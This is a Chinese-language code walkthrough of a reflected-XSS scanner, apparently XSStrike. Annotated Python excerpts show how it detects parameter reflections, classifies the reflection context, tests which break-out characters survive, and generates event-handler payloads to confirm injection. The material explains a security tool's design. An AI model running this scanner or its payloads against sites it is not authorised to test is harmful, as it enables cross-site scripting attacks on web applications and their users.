扫描器工作流程图
具体流程代码
主扫描文件为scan.py
def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, find, skip):
    """Main scan driver (excerpt): probe each parameter for reflected XSS.

    NOTE(review): this excerpt references names defined elsewhere in the
    original scan.py (requester, logger, params, url, xsschecker, vectors,
    htmlParser, filterChecker, checker, core, unquote, que, minEfficiency,
    copy) — it is not runnable standalone.
    """
    # GET when no POST data was supplied, POST otherwise
    GET, POST = (False, True) if paramData else (True, False)
    # If the user hasn't supplied the root url with http(s), we will handle it
    if not target.startswith('http'):
        try:
            response = requester('https://' + target, {},
                                 headers, GET, delay, timeout)
            target = 'https://' + target
        except:
            # https probe failed for any reason — fall back to plain http
            target = 'http://' + target
    logger.debug('Scan target: {}'.format(target))
    response = requester(target, {}, headers, GET, delay, timeout).text
    # (DOM-scan and WAF-detection code removed from this excerpt)
    for paramName in params.keys():
        paramsCopy = copy.deepcopy(params)
        logger.info('Testing parameter: %s' % paramName)
        if encoding:
            paramsCopy[paramName] = encoding(xsschecker)
        else:
            paramsCopy[paramName] = xsschecker  # parameter value replaced with the probe string (v3dm0s)
        # requester wraps `requests` and applies the supplied headers
        response = requester(url, paramsCopy, headers, GET, delay, timeout)
        occurences = htmlParser(response, encoding)
        positions = occurences.keys()  # positions where the probe reflects in the page source
        logger.debug('Scan occurences: {}'.format(occurences))
        if not occurences:
            logger.error('No reflection found')
            continue
        else:
            logger.info('Reflections found: %i' % len(occurences))  # how many reflection positions were found
            logger.run('Analysing reflections')
            efficiencies = filterChecker(
                url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
            logger.debug('Scan efficiencies: {}'.format(efficiencies))
            logger.run('Generating payloads')
            # total payload count across all confidence buckets
            total = 0
            for v in vectors.values():
                total += len(v)
            if total == 0:
                logger.error('No vectors were crafted.')
                continue
            logger.info('Payloads generated: %i' % total)
            progress = 0
            print('vectors', vectors)
            for confidence, vects in vectors.items():
                for vect in vects:
                    if core.config.globalVariables['path']:
                        # payload is injected into the URL path — escape slashes
                        vect = vect.replace('/', '%2F')
                    loggerVector = vect
                    progress += 1
                    logger.run('Progress: %i/%i\r' % (progress, total))
                    if not GET:
                        vect = unquote(vect)
                    # if our payload appears verbatim in the response, the
                    # vulnerability is essentially confirmed and can be reported
                    efficiencies = checker(
                        url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding)
                    if not efficiencies:
                        for i in range(len(occurences)):
                            efficiencies.append(0)
                    bestEfficiency = max(efficiencies)
                    if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
                        logger.red_line()
                        logger.good('Payload: %s' % loggerVector)
                        logger.info('Efficiency: %i' % bestEfficiency)
                        logger.info('Confidence: %i' % confidence)
                        if not skip:
                            choice = input(
                                '%s Would you like to continue scanning? [y/N] ' % que).lower()
                            if choice != 'y':
                                quit()
                    elif bestEfficiency > minEfficiency:
                        logger.red_line()
                        logger.good('Payload: %s' % loggerVector)
                        logger.info('Efficiency: %i' % bestEfficiency)
                        logger.info('Confidence: %i' % confidence)
        logger.no_format('')
htmlParser.py 文件(省略requester.py文件,此文件为对request的封装)
import re
import sys
sys.path.append("..")
from config import badTags, xsschecker
from utils.utils import isBadContext, equalize, escaped, extractScripts
from utils.log import log #打印日志
#通过解析html,找出我们的输入输出在了哪种环境下
def htmlParser(response, encoding):
    """Locate every reflection of the probe string and classify its context.

    Walks the HTML response and records, for each position where the probe
    (`xsschecker`) reflects, whether it landed inside a <script> block, a tag
    attribute, plain HTML text, or an HTML comment, plus the details (tag
    name, attribute name/value, quote character) needed to craft a payload
    for that context.

    Args:
        response: the `requests` response object of the probed request.
        encoding: optional callable used to encode the probe; when given,
            encoded reflections are normalized back to the raw probe first.

    Returns:
        dict keyed by reflection position, each value shaped as
        {'position': int, 'context': 'script'|'attribute'|'html'|'comment',
         'details': dict}.

    NOTE(review): depends on module-level names imported at the top of this
    file (xsschecker, extractScripts, escaped, isBadContext, log).
    """
    print('进入htmlParser')
    rawResponse = response  # raw response returned by requests
    response = response.text  # response content
    if encoding:  # if the user has specified an encoding, normalize the probe
        response = response.replace(encoding(xsschecker), xsschecker)
    reflections = response.count(xsschecker)
    print("有回显且回显位置有{}".format(reflections))
    position_and_context = {}
    environment_details = {}
    # strip HTML comments so they don't pollute script/attribute matching
    clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response)
    script_checkable = clean_response
    # 1) reflections that landed inside <script> blocks
    for script in extractScripts(script_checkable):
        occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
        if occurences:  # NOTE: finditer is always truthy; kept for parity
            for occurence in occurences:
                log.debug('occurences%s'%occurence)
                thisPosition = occurence.start(1)
                position_and_context[thisPosition] = 'script'
                environment_details[thisPosition] = {}
                environment_details[thisPosition]['details'] = {'quote' : ''}
                # record the unescaped quote enclosing the probe; stop at the
                # first unescaped closing bracket/brace
                for i in range(len(occurence.group())):
                    currentChar = occurence.group()[i]
                    if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
                        environment_details[thisPosition]['details']['quote'] = currentChar
                    # FIX: original tuple listed '}' twice
                    elif currentChar in (')', ']', '}') and not escaped(i, occurence.group()):
                        break
        script_checkable = script_checkable.replace(xsschecker, '', 1)
    # 2) reflections inside tag attributes (fewer classified than reflected
    #    means some reflections are outside <script> blocks)
    if len(position_and_context) < reflections:
        attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response)
        for occurence in attribute_context:
            match = occurence.group(0)  # the whole matched tag
            thisPosition = occurence.start(1)
            parts = re.split(r'\s', match)
            tag = parts[0][1:]  # tag name, e.g. 'input'
            for part in parts:
                if xsschecker in part:
                    Type, quote, name, value = '', '', '', ''
                    if '=' in part:
                        # quote character (if any) right after '=', e.g. value="v3dm0s"
                        quote = re.search(r'=([\'`"])?', part).group(1)
                        # split value="v3dm0s" into name and value
                        name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])
                        if xsschecker == name_and_value[0]:
                            Type = 'name'
                        else:
                            Type = 'value'
                        name = name_and_value[0]
                        value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
                    else:
                        Type = 'flag'  # bare attribute with no value
                    position_and_context[thisPosition] = 'attribute'
                    environment_details[thisPosition] = {}
                    environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name}
    # 3) reflections in plain HTML text
    if len(position_and_context) < reflections:
        html_context = re.finditer(xsschecker, clean_response)
        for occurence in html_context:
            print(occurence,'occurenceoccurence')
            thisPosition = occurence.start()
            if thisPosition not in position_and_context:
                position_and_context[occurence.start()] = 'html'
                environment_details[thisPosition] = {}
                environment_details[thisPosition]['details'] = {}
    # 4) reflections inside HTML comments — searched in the raw response,
    #    since comments were stripped from clean_response
    if len(position_and_context) < reflections:
        comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response)
        for occurence in comment_context:
            thisPosition = occurence.start(1)
            position_and_context[thisPosition] = 'comment'
            environment_details[thisPosition] = {}
            environment_details[thisPosition]['details'] = {}
    # assemble the final, position-sorted database
    database = {}
    for i in sorted(position_and_context):
        database[i] = {}
        database[i]['position'] = i
        database[i]['context'] = position_and_context[i]
        database[i]['details'] = environment_details[i]['details']
    print(database,666666666666666)
    # Mark reflections that sit inside non-executable tags (style, textarea,
    # ...). FIX: the original line began with a stray 'Z', a syntax error.
    bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
    non_executable_contexts = []
    for each in bad_contexts:
        non_executable_contexts.append([each.start(), each.end(), each.group(1)])
    if non_executable_contexts:
        for key in database:
            position = database[key]['position']
            badTag = isBadContext(position, non_executable_contexts)
            if badTag:
                database[key]['details']['badTag'] = badTag
            else:
                database[key]['details']['badTag'] = ''
    return database
产生payload vectors = generator(occurences, response.text) generator.py
def generator(occurences, response):
    """Build XSS payload vectors for each reflection (excerpt).

    Only the plain-HTML context branch is shown in this excerpt; the
    original function also handles script/attribute/comment contexts and
    ends with `return vectors`.

    NOTE(review): relies on names defined elsewhere (extractScripts, genGen,
    fillings, eFillings, lFillings, eventHandlers, tags, functions) — not
    runnable standalone.
    """
    scripts = extractScripts(response)
    index = 0
    # payload buckets keyed by confidence score (11 = highest confidence)
    vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
               6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
    print(occurences,'occurencesoccurences')
    for i in occurences:
        context = occurences[i]['context']
        if context == 'html':
            # efficiency scores for reflecting '<' and '>' at this position
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
            if greatBracketEfficiency == 100:
                ends.append('>')
            # a tag can only be opened if '<' survives reflection at all
            if lessBracketEfficiency:
                print(ends,'endsendsendsendsends')
                payloads = genGen(fillings, eFillings, lFillings,
                                  eventHandlers, tags, functions, ends, badTag)  # e.g. ends = ['//', '>']
                print(len(payloads),888888888)
                for payload in payloads:
                    vectors[10].add(payload)
def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
    """Generate HTML-tag-based XSS payload vectors.

    Builds the cartesian product of tag x compatible event handler x JS
    function x filler/end variations, e.g. `<tAg onEvent=func()//bait`.

    Args:
        fillings/eFillings/lFillings: filler strings placed around the
            event handler and function.
        eventHandlers: dict mapping handler name -> list of compatible tags.
        tags: candidate HTML tag names.
        functions: JS snippets to fire, e.g. confirm().
        ends: payload terminators, e.g. ['//', '>'].
        badTag: enclosing non-executable tag to break out of first, if any.

    Returns:
        list of payload strings.

    NOTE(review): depends on module-level names randomUpper and xsschecker.
    FIX: removed an unused `count = 0` local and dead commented-out debug
    prints from the original.
    """
    vectors = []
    r = randomUpper  # randomUpper randomly converts chars of a string to uppercase
    for tag in tags:
        # 'd3v'/'a' tags don't fire by themselves: append bait text the
        # victim will interact with
        if tag == 'd3v' or tag == 'a':
            bait = xsschecker
        else:
            bait = ''
        for eventHandler in eventHandlers:
            # only pair the tag with event handlers it is compatible with
            if tag in eventHandlers[eventHandler]:
                for function in functions:
                    for filling in fillings:
                        for eFilling in eFillings:
                            for lFilling in lFillings:
                                for end in ends:
                                    if tag == 'd3v' or tag == 'a':
                                        if '>' in ends:
                                            end = '>'  # we can't use // as > with "a" or "d3v" tag
                                    breaker = ''
                                    if badTag:
                                        # close the surrounding non-executable tag first
                                        breaker = '</' + r(badTag) + '>'
                                    vector = breaker + '<' + r(tag) + filling + r(
                                        eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
                                    vectors.append(vector)
    return vectors
再次利用产生的payload 验证是否存在xss
# Re-test with the generated payloads to confirm the XSS actually fires.
# (Excerpt from inside scan(); relies on names bound earlier in that
# function: vectors, core, logger, progress, total, GET, unquote, checker,
# url, paramsCopy, headers, delay, positions, timeout, encoding,
# occurences, skip, que, minEfficiency.)
for confidence, vects in vectors.items():
    for vect in vects:
        if core.config.globalVariables['path']:
            # payload is injected into the URL path — escape slashes
            vect = vect.replace('/', '%2F')
        loggerVector = vect
        progress += 1
        logger.run('Progress: %i/%i\r' % (progress, total))
        if not GET:
            vect = unquote(vect)
        # if our payload appears verbatim in the response, the vulnerability
        # is essentially confirmed and can be reported
        efficiencies = checker(
            url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding)
        if not efficiencies:
            for i in range(len(occurences)):
                efficiencies.append(0)
        bestEfficiency = max(efficiencies)
        if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
            logger.red_line()
            logger.good('Payload: %s' % loggerVector)
            logger.info('Efficiency: %i' % bestEfficiency)
            logger.info('Confidence: %i' % confidence)
            if not skip:
                choice = input(
                    '%s Would you like to continue scanning? [y/N] ' % que).lower()
                if choice != 'y':
                    quit()
        elif bestEfficiency > minEfficiency:
            logger.red_line()
            logger.good('Payload: %s' % loggerVector)
            logger.info('Efficiency: %i' % bestEfficiency)
            logger.info('Confidence: %i' % confidence)
logger.no_format('')
关键对比函数 checker
#payload 为前文生成的environment {'"', '>', '<'}
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
    """Measure how faithfully `payload` is reflected at each known position.

    Sends the payload wrapped in unique markers ('st4r7s' ... '3nd'),
    locates the markers in the response, and fuzzy-compares what actually
    came back against what was sent. Returns a list of efficiency scores
    (0-100), one per reflected position, with falsy entries filtered out.

    NOTE(review): depends on names defined elsewhere (requester,
    replaceValue, xsschecker, copy, fillHoles, fuzz, re, unquote).
    """
    checkString = 'st4r7s' + payload + '3nd'
    if encoding:
        checkString = encoding(unquote(checkString))
    response = requester(url, replaceValue(
        params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
    # start offsets of every reflected marker in the response
    reflectedPositions = []
    for match in re.finditer('st4r7s', response):
        reflectedPositions.append(match.start())
    filledPositions = fillHoles(positions, reflectedPositions)
    # Iterating over the reflections
    num = 0
    efficiencies = []
    for position in filledPositions:
        allEfficiencies = []
        try:
            # slice the response where the marker landed; e.g. for
            # checkString 'st4r7s>3nd' the page may contain 'st4r7s&gt;3nd'
            reflected = response[reflectedPositions[num]
                                 :reflectedPositions[num]+len(checkString)]
            # partial_ratio returns 100 when one string is a substring of the other
            efficiency = fuzz.partial_ratio(reflected, checkString.lower())
            allEfficiencies.append(efficiency)
        except IndexError:
            pass
        if position:
            reflected = response[position:position+len(checkString)]
            if encoding:
                checkString = encoding(checkString.lower())
            efficiency = fuzz.partial_ratio(reflected, checkString)
            # a backslash-escaped payload still counts as 90% efficient
            if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
                efficiency = 90
            allEfficiencies.append(efficiency)
            efficiencies.append(max(allEfficiencies))
        else:
            efficiencies.append(0)
        num += 1
    # NOTE(review): filter(None, ...) also drops 0 scores from the result
    return list(filter(None, efficiencies))
def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
    """Score which break-out characters survive reflection at each position.

    Builds the set of characters/strings needed to escape each reflection
    context (quotes, '-->', '</scRipT/>', ...), probes each one with
    checker(), and writes the per-character efficiency into
    occurences[i]['score'].

    Returns:
        the same `occurences` dict, augmented with 'score' sub-dicts.

    NOTE(review): depends on checker() defined elsewhere in the project.
    FIXES vs original: removed `sortedEfficiencies`, which was built but
    never used; the srcdoc branch now adds the HTML-entity-ENCODED forms
    '&lt;'/'&gt;' as its own comment describes — the original re-added the
    plain '<'/'>', a no-op since they are already in the set.
    """
    positions = occurences.keys()
    # adding < > to environments anyway because they can be used in all contexts
    environments = set(['<', '>'])
    for i in occurences:
        occurences[i]['score'] = {}
        context = occurences[i]['context']
        if context == 'comment':
            environments.add('-->')  # needed to break out of an HTML comment
        elif context == 'script':
            environments.add(occurences[i]['details']['quote'])
            environments.add('</scRipT/>')  # needed to break out of the script block
        elif context == 'attribute':
            if occurences[i]['details']['type'] == 'value':
                if occurences[i]['details']['name'] == 'srcdoc':
                    # srcdoc accepts html data with html-entity encoding, so
                    # also probe the encoded versions of < and >
                    environments.add('&lt;')
                    environments.add('&gt;')
            if occurences[i]['details']['quote']:
                environments.add(occurences[i]['details']['quote'])
    print(environments,'environmentsenvironmentsenvironments')
    for environment in environments:
        if environment:  # a script-context quote may be '' — skip it
            efficiencies = checker(
                url, params, headers, GET, delay, environment, positions, timeout, encoding)
            # pad with zeros so every occurence receives a score
            efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
            for occurence, efficiency in zip(occurences, efficiencies):
                occurences[occurence]['score'][environment] = efficiency
    print(occurences,'occurencesoccurences')
    return occurences